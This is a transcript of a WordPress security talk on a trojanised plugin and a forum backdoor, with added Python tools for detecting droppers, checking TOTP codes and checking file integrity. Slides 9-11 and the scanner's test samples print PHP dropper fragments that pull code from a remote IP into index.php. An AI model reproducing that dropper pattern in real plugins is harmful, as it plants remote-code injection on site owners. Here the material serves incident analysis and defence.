WordPress Security
Learning From Website Hacks

Notes
  • Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure the integrity and security. It's simple and effective, yet many don't apply it for whatever reason. We're too busy focusing on that quick solution that will end all my problems. That one plugin that will harden my entire site to the point where I won't be able to access it and none of my plugins will work.
  • Be sure to check out Jason Cosper's presentation earlier this evening, should be up on WordSesh soon, but he goes through some good tips on hardening your WordPress site.
Transcript

Slide 1: WordPress Security - Learning From Website Hacks
Slide 2: This is me!
Sucuri Inc. - Website Security
o Incident Handling
o Log Analysis
Tony Perez, COO - Sucuri, Inc. | sucuri.net | @perezbox
Slide 3: Let's Learn from Website Attacks
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
Slide 4: Attack Scenarios
o The Art of Phishing
o Stealing Credit Cards
Slide 5: Scenario Uno (One) - The Art of Phishing Naive Users
Slide 6: Attack of Opportunity
o Holiday season / holiday spirit
o Did you say Free?
Slide 7: Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au - the "Pro" archive is served out of some other site's wp-content directory, not from the official plugin repository.
Slide 8: Difference
o Pro version? Legit version?
o The "Pro" archive differs from the legitimate plugin in one modified file: aioseop_class.php
Slide 9: Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
$code_txt = 'http://91.239.15.61/o1.txt';
o Placing it in the file here:
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
Slide 10: How?
o index.php payload:
o Using curl to pull content from here:
$url = http://91.239.15.61/java/google.php;
Slide 11: Payload
o Pulls content from:
http://91.239.15.61/google.js - redirection to porn sites
http://91.239.15.61/g.php - exploit kits
Slide 12: Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator...
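To make the dropper behaviour from slides 9-11 concrete, here is an added example (mine, not code from the deck and not Sucuri's) that statically triages PHP plugin files for it: a variable assigned a remote URL that is later handed to a fetch function, and a file_put_contents() whose destination resolves to index.php. It also flags files that pull content from a bare-IP URL at request time, which is the second stage the deck shows. The three PHP samples inside it are constructed stand-ins modelled on the slides, not the actual malware, and the plugin directory layout and file names are assumptions.

```python
"""Static triage of PHP files for the plugin-dropper pattern described on slides 9-11.

Added example; NOT the malware from the deck and not Sucuri code. The PHP samples
are constructed stand-ins: a trojanised plugin class that fetches text from a
remote IP and writes it into index.php, the dropped index.php that curls a remote
script, and a clean plugin file that should not be flagged.
"""
import re
import tempfile
from pathlib import Path

# Constructed sample: trojanised aioseop_class.php (fetch remote text, drop into index.php).
TROJANIZED_PLUGIN = r"""<?php
class All_in_One_SEO_Pack {
    function update_index($path) {
        $code_txt = 'http://91.239.15.61/o1.txt';
        $code = file_get_contents($code_txt);
        $index_path = $path.'/index.php';
        if(file_put_contents($index_path, $code)){ return true; }
        return false;
    }
}
"""

# Constructed sample: the dropped index.php that pulls content over curl at request time.
INJECTED_INDEX = r"""<?php
$url = 'http://91.239.15.61/java/google.php';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
"""

# Constructed sample: a benign plugin file with no remote fetch and no file writes.
CLEAN_PLUGIN = r"""<?php
class All_in_One_SEO_Pack {
    function init() { add_action('wp_head', array($this, 'wp_head')); }
    function wp_head() { echo '<meta name="description" content="'.esc_attr($this->desc).'" />'; }
}
"""

# Variables assigned a remote URL literal, e.g. $code_txt = 'http://...'
URL_VAR = re.compile(r"(\$\w+)\s*=\s*['\"]https?://")
# Variables whose assigned value mentions index.php, e.g. $index_path = $path.'/index.php'
INDEX_VAR = re.compile(r"(\$\w+)\s*=\s*[^;=]*index\.php")
# Remote-fetch calls and their first argument (a variable or a URL literal).
FETCH = re.compile(r"\b(?:curl_init|file_get_contents|fopen)\s*\(\s*(\$\w+|['\"]https?://[^'\"]*['\"])")
# file_put_contents calls and their destination argument.
WRITE = re.compile(r"\bfile_put_contents\s*\(\s*(\$\w+|['\"][^'\"]*['\"])")
# Any URL pointing at a bare IPv4 address instead of a hostname.
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")


def scan_php(source: str) -> dict:
    """Classify one PHP source text; returns the individual indicators and a verdict."""
    url_vars = set(URL_VAR.findall(source))
    index_vars = set(INDEX_VAR.findall(source))
    fetches_remote = any(
        arg in url_vars or arg.strip("'\"").startswith("http") for arg in FETCH.findall(source)
    )
    writes_index = any(
        arg in index_vars or "index.php" in arg for arg in WRITE.findall(source)
    )
    bare_ip = BARE_IP_URL.search(source) is not None
    if fetches_remote and writes_index:
        verdict = "dropper"          # fetches code from outside and writes it into index.php
    elif fetches_remote and bare_ip:
        verdict = "remote_include"   # pulls content from a bare-IP server on every request
    else:
        verdict = "clean"
    return {"fetches_remote": fetches_remote, "writes_index_php": writes_index,
            "bare_ip_url": bare_ip, "verdict": verdict}


def scan_tree(root: Path) -> dict:
    """Scan every .php file under root; returns {relative path: verdict} for non-clean files."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        result = scan_php(path.read_text(errors="replace"))
        if result["verdict"] != "clean":
            hits[path.relative_to(root).as_posix()] = result["verdict"]
    return hits


def demo() -> dict:
    """Write the constructed samples into a temporary WordPress-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp) / "wp-content" / "plugins" / "all-in-one-seo-pack"
        plugin.mkdir(parents=True)
        (plugin / "aioseop_class.php").write_text(TROJANIZED_PLUGIN)
        (plugin / "aioseop_clean.php").write_text(CLEAN_PLUGIN)
        (Path(tmp) / "index.php").write_text(INJECTED_INDEX)
        return scan_tree(Path(tmp))


if __name__ == "__main__":
    for rel, verdict in demo().items():
        print(f"{verdict:15} {rel}")
```

Point scan_tree() at wp-content/plugins (or at a freshly unzipped download before you install it) and treat any "dropper" hit as a reason to throw the archive away; the regexes are deliberately narrow, so a clean result says nothing about obfuscated code, which is why the slide's advice to start from the official repository still comes first.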
Slide 13: Scenario Dos (Two) - Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Slide 14: Got e-Commerce?
o Business owners <3 e-commerce
o CMS extensibility = WooCommerce
o Quick setup of payment collection systems for goods
o Awesome, right?
Slide 15: Big Target
o Credit card = cha-ching
o Used/shared/sold underground
o Impact is catastrophic
  o Blacklisting
  o Ban
  o No more cash flow! No more trust!
Slide 16: Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same environment (for example, another application on the same server, running as the same user).
Slide 17: vBulletin
o Popular CMS application for forums
o WordPress + vBulletin configurations common
Slide 18: Scenario
o WordPress: main website | blog | e-commerce
o vBulletin: forum
o 1 server
Slide 19: Payload
Found here: /wp-admin/includes/list.php - a file dropped among WordPress core files, which is exactly what an integrity check against a clean copy of core is meant to catch.
Slide 20: How?
o It's about the journey folks...
Slide 21: Scenario
o list.php?
o shop.txt?
Slide 22: That's Interesting
/forum/ajax.php?edit= - a request into the vBulletin forum, not into the WordPress install
Slide 23: vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.
Slide 24: Dump of Users
Slide 25: Attack Vector
o Access control
Slide 26: Lessons to be Learned
o Attackers are smart - surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
Slide 27: What can you do? Let's get proactive!
Slide 28: Harsh Reality
None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips...
Slide 29: Two Important Vectors
o Access control
  o Within your control...
o Software vulnerabilities
  o Not so much...
Slide 30: Defense in Depth
• There is no single cure
• Layered defenses
• Combination of tools and actions
  – Combine: protection and detection
Slide 31: Access Control
o Google Authenticator - 2FA
  o http://wordpress.org/plugins/google-authenticator/
o Duo Security - 2FA
  o http://wordpress.org/plugins/duo-wordpress/
o Login Security Solution - policy / enforcement
  o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remediation - complete website security
  o http://sucuri.net/signup
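The slide lists TOTP-based 2FA plugins without saying what the login check actually involves, so here is an added example (mine, not the code of Google Authenticator, Duo or any plugin named above) of the server side of a TOTP check as RFC 6238 defines it. It assumes the Google Authenticator defaults (HMAC-SHA1, 30-second step, 6 digits) and uses the RFC's published test secret, so the expected codes are the RFC's own. The one-step tolerance window and the replay rule are the two details worth checking in whichever plugin you adopt.

```python
"""TOTP (RFC 6238) code generation and verification with a window and replay protection.

Added example; not the code of any plugin listed on the slide. Google Authenticator
defaults (SHA-1, 30-second step, 6 digits) are assumed. The base32 secret is the
RFC 6238 test key "12345678901234567890", so the codes it produces are the RFC's.
"""
import base64
import hashlib
import hmac
import struct

RFC_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"  # base32 of b"12345678901234567890"


def decode_secret(secret_b32: str) -> bytes:
    """Secrets shown in QR codes are usually unpadded base32; restore padding first."""
    s = secret_b32.strip().replace(" ", "").upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(binary % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """The code an authenticator app displays at unix_time."""
    return hotp(decode_secret(secret_b32), unix_time // step, digits)


class TotpVerifier:
    """Server-side check: accept codes within +/-window steps, never accept a step twice."""

    def __init__(self, secret_b32: str, window: int = 1, step: int = 30, digits: int = 6):
        self.secret = decode_secret(secret_b32)
        self.window, self.step, self.digits = window, step, digits
        self.last_counter = -1  # highest counter already accepted; replay protection

    def verify(self, code: str, unix_time: int) -> bool:
        if not (code.isdigit() and len(code) == self.digits):
            return False
        now = unix_time // self.step
        for counter in range(now - self.window, now + self.window + 1):
            if counter <= self.last_counter:
                continue  # already consumed, or older than a step we already accepted
            # Constant-time compare so the check does not leak how many digits matched.
            if hmac.compare_digest(hotp(self.secret, counter, self.digits), code):
                self.last_counter = counter
                return True
        return False


if __name__ == "__main__":
    for t in (59, 1111111109, 1111111111, 1234567890):
        print(t, totp(RFC_SECRET_B32, t))
```

In a real deployment last_counter lives in the user's record, not in memory, and the secret is stored encrypted; the window exists for clock skew between phone and server, and should stay at one step, because every extra step doubles the number of codes a guesser can hit.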
Slide 32: Software Vulnerabilities
o Trusted sources
  o Start with the repo and established communities
  o If you're not a developer this is going to be mostly beyond your reach
o Web Application Firewall (WAF) plugins
  o Highly ineffective, evading and bypassing is easy
  o Can cause denial of service: they run inside the application, so the filtering itself costs PHP time on every request
o SaaS-based Web Application Firewall (WAF) more effective!
  o Sucuri CloudProxy WAF
Slide 33: Auditing
• Know what is going on with your site
  – Integrity checks
  – Logging in / logging out
  – Changes being made
• More important than half the hardening tips you read online today
• Options:
  – WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
  – Sucuri Premium Plugin http://wordpress.sucuri.net
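The integrity check on this slide and the dropped /wp-admin/includes/list.php from slide 19 are two sides of one mechanism, so here is one added example (mine, not Sucuri's plugin, WP Security Audit Log or WordPress code) that covers both: hash every file under the web root into a manifest, sign the manifest with a key kept off the server, and later diff a fresh scan against it. The tiny WordPress-like tree, the dropped file's contents and the HMAC key are all constructed for the demo.

```python
"""File-integrity baseline for a web root: build, sign, verify and diff a manifest.

Added example; not Sucuri's plugin and not WordPress code. Hash every file, keep the
manifest (and its tag) somewhere the web server cannot write, and compare later.
The demo tree, the dropped list.php and the signing key are constructed here.
"""
import hashlib
import hmac
import json
import tempfile
from pathlib import Path


def build_manifest(root: Path) -> dict:
    """Map each file's path relative to root to the SHA-256 of its contents."""
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def sign_manifest(manifest: dict, key: bytes) -> str:
    """HMAC-SHA256 over canonical JSON, so a manifest edited by the attacker is detectable."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def verify_manifest(manifest: dict, tag: str, key: bytes) -> bool:
    return hmac.compare_digest(sign_manifest(manifest, key), tag)


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Files added, removed or changed since the baseline was taken."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def demo() -> dict:
    """Baseline a constructed WordPress-like tree, then simulate the compromise from the deck."""
    key = b"constructed demo key; the real one must live off the server"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        includes = root / "wp-admin" / "includes"
        includes.mkdir(parents=True)
        (includes / "plugin.php").write_text("<?php // stand-in for a core file\n")
        (root / "wp-config.php").write_text("<?php define('DB_NAME', 'wordpress');\n")
        (root / "index.php").write_text("<?php require 'wp-blog-header.php';\n")

        baseline = build_manifest(root)
        tag = sign_manifest(baseline, key)

        # Simulated compromise: a file dropped where the deck found its payload,
        # plus an edit to an existing file. Contents are placeholders, not malware.
        (includes / "list.php").write_text("<?php // stand-in for the dropped payload\n")
        (root / "index.php").write_text("<?php /* injected */ require 'wp-blog-header.php';\n")

        report = diff_manifests(baseline, build_manifest(root))
        report["baseline_verified"] = verify_manifest(baseline, tag, key)
        return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Take the baseline from a clean install or right after a deployment, store the manifest and its tag off-host (an attacker who can write list.php can also rewrite a manifest sitting next to it), and re-run the diff on a schedule; the "added" list is where a dropped file in wp-admin/includes shows up first.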
Slide 34: If all else fails...
o Be sure you have backups...
o VaultPress - WordPress sites
o Sucuri Backups - WordPress and everything else
o SaaS-based backups more effective!
Slide 35: Tony Perez
@perezbox | @sucuri_security
tony@sucuri.net
#wordsesh